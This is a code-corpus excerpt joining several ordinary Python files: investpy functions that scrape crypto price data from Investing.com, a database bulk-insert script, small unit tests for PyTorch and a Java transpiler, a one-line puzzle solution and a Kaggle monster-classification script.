            crypto_date = datetime.strptime(str(datetime.fromtimestamp(int(info[0])).date()), '%Y-%m-%d')
            crypto_close = float(info[1].replace(',', ''))
            crypto_open = float(info[2].replace(',', ''))
            crypto_high = float(info[3].replace(',', ''))
            crypto_low = float(info[4].replace(',', ''))
            crypto_volume = int(info[5])

            result.insert(len(result),
                          Data(crypto_date, crypto_open, crypto_high, crypto_low,
                               crypto_close, crypto_volume, crypto_currency, None))

        # Rows arrive newest-first (sort_ord=DESC), so reverse for ascending.
        if order in ['ascending', 'asc']:
            result = result[::-1]
        elif order in ['descending', 'desc']:
            result = result

        if as_json is True:
            json_ = {
                'name': crypto_name,
                'recent':
                    [value.crypto_as_json() for value in result]
            }

            return json.dumps(json_, sort_keys=False)
        elif as_json is False:
            df = pd.DataFrame.from_records([value.crypto_to_dict() for value in result])
            df.set_index('Date', inplace=True)

            return df
    else:
        raise RuntimeError("ERR#0004: data retrieval error while scraping.")
def get_crypto_historical_data(crypto, from_date, to_date, as_json=False, order='ascending', interval='Daily'):
    """
    This function retrieves historical data from the introduced crypto from Investing.com. So on, the historical data
    of the introduced crypto will be retrieved and returned as a :obj:`pandas.DataFrame` if the parameters are valid
    and the request to Investing.com succeeds. Note that additionally some optional parameters can be specified: as_json
    and order, which let the user decide if the data is going to be returned as a :obj:`json` or not, and if the historical
    data is going to be ordered ascending or descending (where the index is the date), respectively.

    Args:
        crypto (:obj:`str`): name of the crypto currency to retrieve data from.
        from_date (:obj:`str`): date formatted as `dd/mm/yyyy`, since when data is going to be retrieved.
        to_date (:obj:`str`): date formatted as `dd/mm/yyyy`, until when data is going to be retrieved.
        as_json (:obj:`bool`, optional):
            to determine the format of the output data, either a :obj:`pandas.DataFrame` if False and a :obj:`json` if True.
        order (:obj:`str`, optional): to define the order of the retrieved data which can either be ascending or descending.
        interval (:obj:`str`, optional):
            value to define the historical data interval to retrieve, by default `Daily`, but it can also be `Weekly` or `Monthly`.

    Returns:
        :obj:`pandas.DataFrame` or :obj:`json`:
            The function can return either a :obj:`pandas.DataFrame` or a :obj:`json` object, containing the retrieved
            historical data of the specified crypto currency. So on, the resulting dataframe contains the open, high,
            low, close and volume values for the selected crypto on market days and the currency in which those values
            are presented.

            The returned data is case we use default arguments will look like::

                Date || Open | High | Low | Close | Volume | Currency
                -----||------|------|-----|-------|--------|----------
                xxxx || xxxx | xxxx | xxx | xxxxx | xxxxxx | xxxxxxxx

            but if we define `as_json=True`, then the output will be::

                {
                    name: name,
                    historical: [
                        {
                            date: 'dd/mm/yyyy',
                            open: x,
                            high: x,
                            low: x,
                            close: x,
                            volume: x,
                            currency: x
                        },
                        ...
                    ]
                }

    Raises:
        ValueError: raised whenever any of the introduced arguments is not valid or errored.
        IOError: raised if cryptos object/file was not found or unable to retrieve.
        RuntimeError: raised if the introduced crypto currency name was not found or did not match any of the existing ones.
        ConnectionError: raised if connection to Investing.com could not be established.
        IndexError: raised if crypto historical data was unavailable or not found in Investing.com.

    Examples:
        >>> investpy.get_crypto_historical_data(crypto='bitcoin', from_date='01/01/2018', to_date='01/01/2019')
                      Open     High      Low    Close  Volume Currency
        Date
        2018-01-01 13850.5  13921.5  12877.7  13444.9   78425      USD
        2018-01-02 13444.9  15306.1  12934.2  14754.1  137732      USD

    """

    # --- argument validation -------------------------------------------------
    if not crypto:
        raise ValueError("ERR#0083: crypto parameter is mandatory and must be a valid crypto name.")

    if not isinstance(crypto, str):
        raise ValueError("ERR#0084: crypto argument needs to be a str.")

    if not isinstance(as_json, bool):
        raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")

    if order not in ['ascending', 'asc', 'descending', 'desc']:
        raise ValueError("ERR#0003: order argument can just be ascending (asc) or descending (desc), str type.")

    if not interval:
        raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")

    if not isinstance(interval, str):
        raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")

    if interval not in ['Daily', 'Weekly', 'Monthly']:
        raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")

    try:
        datetime.strptime(from_date, '%d/%m/%Y')
    except ValueError:
        raise ValueError("ERR#0011: incorrect from_date date format, it should be 'dd/mm/yyyy'.")

    try:
        datetime.strptime(to_date, '%d/%m/%Y')
    except ValueError:
        raise ValueError("ERR#0012: incorrect to_date format, it should be 'dd/mm/yyyy'.")

    start_date = datetime.strptime(from_date, '%d/%m/%Y')
    end_date = datetime.strptime(to_date, '%d/%m/%Y')

    if start_date >= end_date:
        raise ValueError("ERR#0032: to_date should be greater than from_date, both formatted as 'dd/mm/yyyy'.")

    # --- split the requested range into <= 19-year chunks --------------------
    # Investing.com rejects ranges of around 20 years or more, so the range
    # is requested in consecutive chunks and the results are concatenated.
    date_interval = {
        'intervals': [],
    }

    flag = True

    while flag is True:
        diff = end_date.year - start_date.year

        if diff > 19:
            try:
                chunk_end = start_date.replace(year=start_date.year + 19)
            except ValueError:
                # 29th February with no leap year 19 years ahead; fall back
                # to the 28th (replace() would otherwise raise).
                chunk_end = start_date.replace(year=start_date.year + 19, day=28)

            obj = {
                'start': start_date.strftime('%m/%d/%Y'),
                'end': chunk_end.strftime('%m/%d/%Y'),
            }

            date_interval['intervals'].append(obj)

            # Continue the day after the previous chunk ended. timedelta is
            # used instead of the former ``replace(day=start_date.day + 1)``,
            # which raised ValueError at month ends (e.g. any 31st, 30th of
            # June, or 28th of February before a non-leap year).
            start_date = chunk_end + timedelta(days=1)
        else:
            obj = {
                'start': start_date.strftime('%m/%d/%Y'),
                'end': end_date.strftime('%m/%d/%Y'),
            }

            date_interval['intervals'].append(obj)

            flag = False

    interval_limit = len(date_interval['intervals'])
    interval_counter = 0

    data_flag = False

    # --- load the bundled crypto reference data (name/id/currency/status) ---
    resource_package = 'investpy'
    resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
    if pkg_resources.resource_exists(resource_package, resource_path):
        cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
    else:
        raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")

    if cryptos is None:
        raise IOError("ERR#0082: cryptos not found or unable to retrieve.")

    # Normalise the user-supplied name (whitespace/case/accents) for matching.
    crypto = crypto.strip()
    crypto = crypto.lower()

    if unidecode.unidecode(crypto) not in [unidecode.unidecode(value.lower()) for value in cryptos['name'].tolist()]:
        raise RuntimeError("ERR#0085: crypto currency: " + crypto + ", not found, check if it is correct.")

    status = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'status']
    if status == 'unavailable':
        raise ValueError("ERR#0086: the selected crypto currency is not available for retrieval in Investing.com.")

    crypto_name = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'name']
    crypto_id = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'id']
    crypto_currency = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'currency']

    header = crypto_name + ' Historical Data'

    final = list()

    # --- request and parse every chunk ---------------------------------------
    for index in range(len(date_interval['intervals'])):
        interval_counter += 1

        params = {
            "curr_id": crypto_id,
            "smlID": str(randint(1000000, 99999999)),
            "header": header,
            "st_date": date_interval['intervals'][index]['start'],
            "end_date": date_interval['intervals'][index]['end'],
            "interval_sec": interval,
            "sort_col": "date",
            "sort_ord": "DESC",
            "action": "historical_data"
        }

        head = {
            "User-Agent": get_random(),  # rotating UA string to reduce scraper blocking
            "X-Requested-With": "XMLHttpRequest",
            "Accept": "text/html",
            "Accept-Encoding": "gzip, deflate, br",
            "Connection": "keep-alive",
        }

        url = "https://www.investing.com/instruments/HistoricalDataAjax"

        req = requests.post(url, headers=head, data=params)

        if req.status_code != 200:
            raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")

        if not req.text:
            continue

        root_ = fromstring(req.text)
        path_ = root_.xpath(".//table[@id='curr_table']/tbody/tr")

        result = list()

        if path_:
            for elements_ in path_:
                if elements_.xpath(".//td")[0].text_content() == 'No results found':
                    # An empty intermediate chunk is tolerated; only raise if
                    # the very last chunk has no data either.
                    if interval_counter < interval_limit:
                        data_flag = False
                    else:
                        raise IndexError("ERR#0087: crypto information unavailable or not found.")
                else:
                    data_flag = True

                # Each cell exposes its raw value in the data-real-value
                # attribute; column order is [timestamp, close, open, high,
                # low, volume].
                info = []

                for nested_ in elements_.xpath(".//td"):
                    info.append(nested_.get('data-real-value'))

                if data_flag is True:
                    crypto_date = datetime.strptime(str(datetime.fromtimestamp(int(info[0])).date()), '%Y-%m-%d')
                    crypto_close = float(info[1].replace(',', ''))
                    crypto_open = float(info[2].replace(',', ''))
                    crypto_high = float(info[3].replace(',', ''))
                    crypto_low = float(info[4].replace(',', ''))
                    crypto_volume = int(info[5])

                    result.insert(len(result),
                                  Data(crypto_date, crypto_open, crypto_high, crypto_low,
                                       crypto_close, crypto_volume, crypto_currency, None))

            if data_flag is True:
                # Rows arrive newest-first (sort_ord=DESC), so reverse for ascending.
                if order in ['ascending', 'asc']:
                    result = result[::-1]
                elif order in ['descending', 'desc']:
                    result = result

                if as_json is True:
                    json_ = {
                        'name': crypto_name,
                        'historical':
                            [value.crypto_as_json() for value in result]
                    }

                    final.append(json_)
                elif as_json is False:
                    df = pd.DataFrame.from_records([value.crypto_to_dict() for value in result])
                    df.set_index('Date', inplace=True)

                    final.append(df)
        else:
            raise RuntimeError("ERR#0004: data retrieval error while scraping.")

    if as_json is True:
        # NOTE(review): only the first chunk is serialised here, so JSON output
        # for ranges longer than 19 years is truncated - kept as-is for
        # backward compatibility, but worth revisiting.
        return json.dumps(final[0], sort_keys=False)
    elif as_json is False:
        return pd.concat(final)
def get_crypto_information(crypto, as_json=False):
    """
    This function retrieves fundamental financial information from the specified crypto currency. The retrieved
    information from the crypto currency can be valuable as it is additional information that can be used combined
    with OHLC values, so to determine financial insights from the company which holds the specified crypto currency.

    Args:
        crypto (:obj:`str`): name of the crypto currency to retrieve information from.
        as_json (:obj:`bool`, optional):
            optional argument to determine the format of the output data (:obj:`dict` or :obj:`json`).

    Returns:
        :obj:`pandas.DataFrame` or :obj:`dict`- crypto_information:
            The resulting :obj:`pandas.DataFrame` contains the information fields retrieved from Investing.com
            from the specified crypto currency; it can also be returned as a :obj:`dict`, if argument `as_json=True`.
            If any of the information fields could not be retrieved, that field/s will be filled with
            None values. If the retrieval process succeeded, the resulting :obj:`dict` will look like::

                crypto_information = {
                    'Chg (7D)': '-4.63%',
                    'Circulating Supply': ' BTC18.10M',
                    'Crypto Currency': 'Bitcoin',
                    'Currency': 'USD',
                    'Market Cap': '$129.01B',
                    'Max Supply': 'BTC21.00M',
                    'Todays Range': '7,057.8 - 7,153.1',
                    'Vol (24H)': '$17.57B'
                }

    Raises:
        ValueError: raised if any of the introduced arguments is not valid or errored.
        FileNotFoundError: raised if `cryptos.csv` file was not found or errored.
        IOError: raised if `cryptos.csv` file is empty or errored.
        RuntimeError: raised if scraping process failed while running.
        ConnectionError: raised if the connection to Investing.com errored (did not return HTTP 200)
    """
    # --- argument validation ---
    if not crypto:
        raise ValueError("ERR#0083: crypto parameter is mandatory and must be a valid crypto name.")
    if not isinstance(crypto, str):
        raise ValueError("ERR#0084: crypto argument needs to be a str.")
    if not isinstance(as_json, bool):
        raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")
    # --- load the packaged reference list of crypto currencies ---
    resource_package = 'investpy'
    resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
    if pkg_resources.resource_exists(resource_package, resource_path):
        cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
    else:
        raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")
    if cryptos is None:
        raise IOError("ERR#0082: cryptos not found or unable to retrieve.")
    crypto = crypto.strip().lower()
    # Accent-insensitive membership check against the reference list.
    if unidecode.unidecode(crypto) not in [unidecode.unidecode(value.lower()) for value in cryptos['name'].tolist()]:
        raise RuntimeError("ERR#0085: crypto currency: " + crypto + ", not found, check if it is correct.")
    # Resolve the matching row index ONCE instead of recomputing the same
    # boolean mask + idxmax() for every column lookup (was done 4 times).
    row_idx = (cryptos['name'].str.lower() == crypto).idxmax()
    status = cryptos.loc[row_idx, 'status']
    if status == 'unavailable':
        raise ValueError("ERR#0086: the selected crypto currency is not available for retrieval in Investing.com.")
    name = cryptos.loc[row_idx, 'name']
    currency = cryptos.loc[row_idx, 'currency']
    tag = cryptos.loc[row_idx, 'tag']
    # --- scrape the crypto profile page ---
    url = "https://www.investing.com/crypto/" + tag
    head = {
        "User-Agent": get_random(),
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "text/html",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }
    req = requests.get(url, headers=head)
    if req.status_code != 200:
        raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")
    root_ = fromstring(req.text)
    path_ = root_.xpath("//div[@class='cryptoGlobalData']/div")
    result = pd.DataFrame(columns=['Crypto Currency', 'Market Cap', 'Circulating Supply', 'Max Supply',
                                   'Vol (24H)', 'Todays Range', 'Chg (7D)', 'Currency'])
    result.at[0, 'Crypto Currency'] = name
    result.at[0, 'Currency'] = currency
    if path_:
        for elements_ in path_:
            element = elements_.xpath(".//span[@class='title']")[0]
            title_ = element.text_content().replace(':', '')
            # Normalize Investing.com's label to the local column name.
            if title_ == "Day's Range":
                title_ = 'Todays Range'
            if title_ in result.columns.tolist():
                result.at[0, title_] = element.getnext().text_content().strip()
        result.replace({'N/A': None}, inplace=True)
        if as_json is True:
            json_ = result.iloc[0].to_dict()
            return json_
        elif as_json is False:
            return result
    else:
        raise RuntimeError("ERR#0004: data retrieval error while scraping.")
def _parse_crypto_overview_row(row):
    """Extract one crypto-currency overview record from a `<tr>` lxml node.

    Used by `get_cryptos_overview` for both the first-page table and the
    AJAX continuation table, which share the same row layout.
    """
    name = row.xpath(".//td[contains(@class, 'elp')]")[0].text_content().strip()
    symbol = row.xpath(".//td[contains(@class, 'symb')]")[0].get('title').strip()
    price = row.xpath(".//td[contains(@class, 'price')]")[0].text_content()
    market_cap = row.xpath(".//td[@class='js-market-cap']")[0].get('data-value')
    volume24h = row.xpath(".//td[@class='js-24h-volume']")[0].get('data-value')
    total_volume = row.xpath(".//td[@class='js-total-vol']")[0].text_content()
    change24h = row.xpath(".//td[contains(@class, 'js-currency-change-24h')]")[0].text_content()
    change7d = row.xpath(".//td[contains(@class, 'js-currency-change-7d')]")[0].text_content()
    return {
        "name": name,
        "symbol": symbol,
        "price": float(price.replace(',', '')),
        "market_cap": float(market_cap.replace(',', '')),
        "volume24h": volume24h,
        "total_volume": total_volume,
        "change24h": change24h,
        "change7d": change7d,
        "currency": "USD"
    }


def get_cryptos_overview(as_json=False, n_results=100):
    """
    This function retrieves an overview containing all the real time data available for the main crypto currencies,
    such as the names, symbols, current value, etc. as indexed in Investing.com. So on, the main usage of this
    function is to get an overview on the main crypto currencies, so to get a general view. Note that since
    this function is retrieving a lot of information at once, by default just the overview of the Top 100 crypto
    currencies is being retrieved, but an additional parameter called n_results can be specified so to retrieve N results.

    Args:
        as_json (:obj:`bool`, optional):
            optional argument to determine the format of the output data (:obj:`pandas.DataFrame` or :obj:`json`).
        n_results (:obj:`int`, optional):
            number of results to be displayed on the overview table (0-all_cryptos), where all crypto currencies will
            be retrieved if n_results=None.

    Note:
        The amount of indexed crypto currencies may vary, so if n_results is set to `None`, all the available crypto
        currencies in Investing while retrieving the overview, will be retrieved and returned.

    Returns:
        :obj:`pandas.DataFrame` - cryptos_overview:
            The resulting :obj:`pandas.DataFrame` contains all the data available in Investing.com of the main crypto
            currencies in order to get an overview of it.

            If the retrieval process succeeded, the resulting :obj:`pandas.DataFrame` should look like::

                name | symbol | price | market_cap | volume24h | total_volume | change24h | change7d | currency
                -----|--------|-------|------------|-----------|--------------|-----------|----------|----------
                xxxx | xxxxxx | xxxxx | xxxxxxxxxx | xxxxxxxxx | xxxxxxxxxxxx | xxxxxxxxx | xxxxxxxx | xxxxxxxx

    Raises:
        ValueError: raised if any of the introduced arguments is not valid or errored.
        IOError: raised if data could not be retrieved due to file error.
        RuntimeError: raised it no overview results could be retrieved from Investing.com.
        ConnectionError: raised if GET requests does not return 200 status code.
    """
    if not isinstance(as_json, bool):
        raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")
    if n_results is not None and not isinstance(n_results, int):
        raise ValueError("ERR#0089: n_results argument should be an integer between 1 and 1000.")
    if n_results is not None:
        if 1 > n_results or n_results > 1000:
            raise ValueError("ERR#0089: n_results argument should be an integer between 1 and 1000.")
    header = {
        "User-Agent": get_random(),
        "X-Requested-With": "XMLHttpRequest",
        "Accept": "text/html",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }
    url = "https://es.investing.com/crypto/currencies"
    req = requests.get(url, headers=header)
    # Consistency fix: every other retrieval in this module surfaces non-200
    # responses as ConnectionError instead of failing later while parsing.
    if req.status_code != 200:
        raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")
    root = fromstring(req.text)
    table = root.xpath(".//table[contains(@class, 'allCryptoTlb')]/tbody/tr")
    results = list()
    # `flag` is True when the first page already satisfies the request
    # (n_results <= 100), so no AJAX continuation call is needed.
    flag = False
    if len(table) > 0:
        if n_results is not None and n_results <= 100:
            table = table[:n_results]
            flag = True
        for row in table:
            results.append(_parse_crypto_overview_row(row))
    else:
        raise RuntimeError("ERR#0092: no data found while retrieving the overview from Investing.com")
    if flag is True:
        df = pd.DataFrame(results)
        if as_json:
            return json.loads(df.to_json(orient='records'))
        else:
            return df
    else:
        # Fetch the remaining rows past the first 100 via the AJAX endpoint,
        # reusing the same request headers.
        params = {
            'lastRowId': 100
        }
        url = 'https://www.investing.com/crypto/Service/LoadCryptoCurrencies'
        req = requests.post(url=url, headers=header, data=params)
        if req.status_code != 200:
            raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")
        root = fromstring(req.json()['html'])
        table = root.xpath(".//tr")
        if n_results is not None:
            remaining_cryptos = n_results - len(results)
            table = table[:remaining_cryptos]
        if len(table) > 0:
            for row in table:
                results.append(_parse_crypto_overview_row(row))
        else:
            raise RuntimeError("ERR#0092: no data found while retrieving the overview from Investing.com")
        df = pd.DataFrame(results)
        if as_json:
            return json.loads(df.to_json(orient='records'))
        else:
            return df
def search_cryptos(by, value):
    """
    This function searches cryptos by the introduced value for the specified field. This means that this function
    is going to search if there is a value that matches the introduced one for the specified field which is the
    `cryptos.csv` column name to search in. Available fields to search cryptos are 'name' and 'symbol'.

    Args:
        by (:obj:`str`): name of the field to search for, which is the column name which can be: 'name' or 'symbol'.
        value (:obj:`str`): value of the field to search for, which is the value that is going to be searched.

    Returns:
        :obj:`pandas.DataFrame` - search_result:
            The resulting :obj:`pandas.DataFrame` contains the search results from the given query, which is
            any match of the specified value in the specified field. If there are no results for the given query,
            an error will be raised, but otherwise the resulting :obj:`pandas.DataFrame` will contain all the
            available cryptos that match the introduced query.

    Raises:
        ValueError: raised if any of the introduced parameters is not valid or errored.
        FileNotFoundError: raised if `cryptos.csv` file is missing.
        IOError: raised if data could not be retrieved due to file error.
        RuntimeError: raised if no results were found for the introduced value in the introduced field.
    """
    # --- argument validation ---
    if not by:
        raise ValueError('ERR#0006: the introduced field to search is mandatory and should be a str.')
    if not isinstance(by, str):
        raise ValueError('ERR#0006: the introduced field to search is mandatory and should be a str.')
    if not value:
        raise ValueError('ERR#0017: the introduced value to search is mandatory and should be a str.')
    if not isinstance(value, str):
        raise ValueError('ERR#0017: the introduced value to search is mandatory and should be a str.')
    # --- load the packaged cryptos reference file ---
    resource_package = 'investpy'
    resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
    if pkg_resources.resource_exists(resource_package, resource_path):
        cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
    else:
        raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")
    if cryptos is None:
        raise IOError("ERR#0082: cryptos not found or unable to retrieve.")
    # Internal columns are not searchable nor returned.
    cryptos.drop(columns=['tag', 'id'], inplace=True)
    available_search_fields = cryptos.columns.tolist()
    # `by` is already known to be a str (validated above), so only the
    # membership check is needed here.
    if by not in available_search_fields:
        raise ValueError('ERR#0026: the introduced field to search can either just be '
                         + ' or '.join(available_search_fields))
    # NOTE(review): `value` is interpreted as a regular expression by
    # str.contains, so regex metacharacters in the query get regex semantics.
    # na=False keeps NaN cells out of the mask (same rows as the previous
    # `== True` comparison, but usable for direct boolean indexing).
    cryptos['matches'] = cryptos[by].str.contains(value, case=False, na=False)
    search_result = cryptos[cryptos['matches']].copy()
    if len(search_result) == 0:
        raise RuntimeError('ERR#0043: no results were found for the introduced ' + str(by) + '.')
    search_result.drop(columns=['matches'], inplace=True)
    search_result.reset_index(drop=True, inplace=True)
    return search_result
| [
"alvarob96@usal.es"
] | alvarob96@usal.es |
dfd98191175a3dd95b1c3ae9ce0834fff3628057 | 99a1b01baed66d3e7ab7c26b1eb8d5832421634b | /db/dbInsert/insertDarwin_Ocean_Color_bcp.py | 819ac4b1bd08f7680ed2d089e9afdd302bebf900 | [] | no_license | mdashkezari/opedia | 011f4d358b1f860ec51cca408c3af9368e036868 | 1e82ae66baedad721c41182f0586fa2a867291c2 | refs/heads/master | 2021-05-09T11:24:18.126622 | 2019-09-12T20:24:06 | 2019-09-12T20:24:06 | 118,988,572 | 9 | 8 | null | 2019-09-11T19:54:30 | 2018-01-26T01:22:55 | HTML | UTF-8 | Python | false | false | 1,147 | py |
import sys
sys.path.append('../')
import insertFunctions as iF
import insertPrep as ip
import config_vault as cfgv
import pandas as pd
import io
import numpy as np
import glob
import xarray as xr
import os.path
############################
########### OPTS ###########
tableName = 'tblDarwin_Ocean_Color'
rawFilePath = '/media/nrhagen/Drobo/OpediaVault/model/darwin_Ocean_Color/rep/'
netcdf_list = glob.glob(rawFilePath + '*.nc')
exportBase = cfgv.opedia_proj + 'db/dbInsert/export_temp/'
prefix = tableName
export_path = '%s%s.csv' % (exportBase, prefix)
############################
############################
# Collect the pre-processed Darwin ocean-color CSV exports and bulk-insert any
# that have not been loaded yet.  The presence of a companion *_BCP.txt marker
# file next to the export directory is used as the "already inserted" flag.
processed_csv_list = glob.glob(rawFilePath + '*darwin_v0.2_cs510_ocean_color*.csv*')
sorted_csvlist = np.sort(processed_csv_list).tolist()
for sorted_csv in sorted_csvlist:
    if os.path.isfile(sorted_csv[:-3] + '_BCP.txt'):
        # Marker file exists: this CSV was bulk-copied on a previous run.
        print(sorted_csv[:-4] + ' already inserted into db. Passing')
        pass
    else:
        print('Inserting ' + sorted_csv[:-4] + ' into db')
        iF.toSQLbcp(sorted_csv, tableName)
        # Touch an empty marker file so this CSV is skipped on the next run.
        file = open(exportBase + os.path.basename(sorted_csv)[:-3] + '_BCP.txt', "w")
        file.close()
| [
"norlandrhagen@gmail.com"
] | norlandrhagen@gmail.com |
27bd80225a47293e5ddca228a1de1c72096f45d8 | 15a3297d6aeb8d8258127a19540c2583c9fc81d1 | /tests/test_array_ops.py | ffb529d419ef0280c913c6b54067c7c9f7d65b88 | [] | no_license | RW74/htm-tensorflow | b6fffcb5e69e05b150a261ab44685c22f72cdc4e | 7baebdd7df393a7f1badee36c97aea36b35913b0 | refs/heads/master | 2020-04-29T08:00:38.308477 | 2019-02-21T07:05:17 | 2019-02-21T07:05:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | from htmtorch.testing.torchtest import TorchTestCase
from htmtorch.functional.array_ops import array_to_nd_index
import torch as tor
class TestArrayOps(TorchTestCase):
    """Unit tests for the htmtorch.functional.array_ops helpers."""

    def test_basic_cuda(self):
        """array_to_nd_index should map flat indices to n-d coordinates.

        NOTE(review): operates on `.cuda()` tensors, so this test requires a
        CUDA-capable device to run.
        """
        # Flat (linear) indices into a 10x10x10 volume.
        ind = tor.LongTensor([110, 125, 235, 333, 404]).cuda()
        nd_shape = tor.LongTensor([10, 10, 10]).cuda()
        xy = array_to_nd_index(ind, nd_shape)
        # Expected coordinates for each flat index, e.g. 110 -> (1, 1, 0).
        result = [[1, 1, 0],
                  [1, 2, 5],
                  [2, 3, 5],
                  [3, 3, 3],
                  [4, 0, 4]]
        self.assertTensorEqual(result, xy)
| [
"josh.miklos@gmail.com"
] | josh.miklos@gmail.com |
20e46df06810abb0fa2b20f57e6b1d069dc6f7cf | 3ae6dc36775925a9a029cdb39788e30e20882028 | /tests/structures/test_interface.py | 6fd7f17584eb3cd27d3198d573ab83c87022c614 | [
"BSD-3-Clause"
] | permissive | rubacalypse/voc | 89939b63596cb1ada2cdc06463d1bb527ef5099e | 485b698247e49ac7bc58c18839d21556018e16a9 | refs/heads/master | 2021-01-18T07:36:34.361276 | 2016-01-03T18:05:27 | 2016-01-03T18:05:27 | 48,055,448 | 0 | 0 | null | 2015-12-15T16:29:37 | 2015-12-15T16:29:36 | null | UTF-8 | Python | false | false | 1,183 | py | from ..utils import TranspileTestCase
class InterfaceTests(TranspileTestCase):
    """Tests that transpiled Python classes can implement native Java interfaces."""

    def test_implement_interface(self):
        "You can implement (and use) a native Java interface"
        # First string literal: the Python source to transpile and run on the
        # JVM; second string literal: the exact stdout expected from that run.
        self.assertJavaExecution(
            """
            from java.lang import StringBuilder
            class MyStringAnalog(implements=java.lang.CharSequence):
                def __init__(self, value):
                    self.value = value
                def charAt(self, index: int) -> char:
                    return 'x'
                def length(self) -> int:
                    return len(self.value)
                def subSequence(self, start: int, end: int) -> java.lang.CharSequence:
                    return MyStringAnalog(self.value[start:end])
                def toString(self) -> java.lang.String:
                    return self.value
            analog = MyStringAnalog("world")
            builder = StringBuilder()
            builder.append("Hello, ")
            builder.append(analog)
            print(builder)
            print("Done.")
            """,
            """
            Hello, world
            Done.
            """, run_in_function=False)
| [
"russell@keith-magee.com"
] | russell@keith-magee.com |
c49c7b30a213953338bacae13bce7542fc685473 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03250/s058422240.py | 419fcf62181f60fc0b7561718d452826ac4f13c6 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 73 | py | L=sorted(list(map(str,input().split())))
# L holds the three input digits sorted ascending (as single-char strings,
# lexicographic order equals numeric order).  Concatenating the two largest
# digits L[2]L[1] as the two-digit term and adding the smallest digit L[0]
# maximises the sum of a two-digit and a one-digit number built from them.
print(int(L[2]+L[1])+int(L[0]))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
cb9bd6a54a31181beeb644511e54151a4fee2fe1 | 1c8bcd2d8e129a92e3328f47d2a452814c033327 | /kaggle/ghouls-goblins-and-ghosts-boo/script_1.py | e347cb42aa2a26bcc394a0ab838bc06f91aabe72 | [
"MIT"
] | permissive | josepablocam/janus-public | 425334706f9a4519534779b7f089262cf5cf0dee | 4713092b27d02386bdb408213d8edc0dc5859eec | refs/heads/main | 2023-03-08T15:21:12.461762 | 2021-02-25T20:53:02 | 2021-02-25T20:53:02 | 314,606,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,797 | py | # Import the required libraries
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn import preprocessing
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
import warnings
warnings.filterwarnings("ignore")
# --- Load the raw Kaggle data and inspect its shape/columns ---
train_data_orig = pd.read_csv('../input/train.csv')
test_data_orig = pd.read_csv('../input/test.csv')
print("Shape of Training Data")
print(train_data_orig.shape)
print("\n")
print("Shape of Testing Data")
print(test_data_orig.shape)
print("Columns in Training Data")
print(train_data_orig.columns)
print("\n")
print("Columns in Testing Data")
print(test_data_orig.columns)
train_data_orig.info()
train_data_orig.head()
# --- Drop the identifier column; it carries no predictive signal ---
train_data = train_data_orig.drop(['id'], axis = 1)
test_data = test_data_orig.drop(['id'], axis = 1)
train_data.describe()
test_data.describe()
print(np.sort(train_data['color'].unique()))
print(np.sort(test_data['color'].unique()))
print(np.sort(train_data['type'].unique()))
# Use LabelEncoder for the 'color' feature
color_le = preprocessing.LabelEncoder()
color_le.fit(train_data['color'])
train_data['color_int'] = color_le.transform(train_data['color'])
# --- Exploratory plots: pairwise distributions, correlations, boxplots ---
_ = sns.pairplot(train_data.drop('color', axis = 1), hue = 'type', palette = 'muted', diag_kind='kde')
train_data.drop('color_int', axis = 1, inplace = True)
_ = sns.heatmap(train_data.corr(), annot = True, fmt = ".2f", cmap = 'YlGnBu')
g = sns.FacetGrid(pd.melt(train_data, id_vars='type', value_vars = ['bone_length', 'rotting_flesh', 'hair_length', 'has_soul']), col = 'type')
g = g.map(sns.boxplot, 'value', 'variable', palette = 'muted')
# --- Baseline: a decision tree evaluated on a 75/25 hold-out split ---
df = pd.get_dummies(train_data.drop('type', axis = 1))
X_train, X_test, y_train, y_test = train_test_split(df, train_data['type'], test_size = 0.25, random_state = 0)
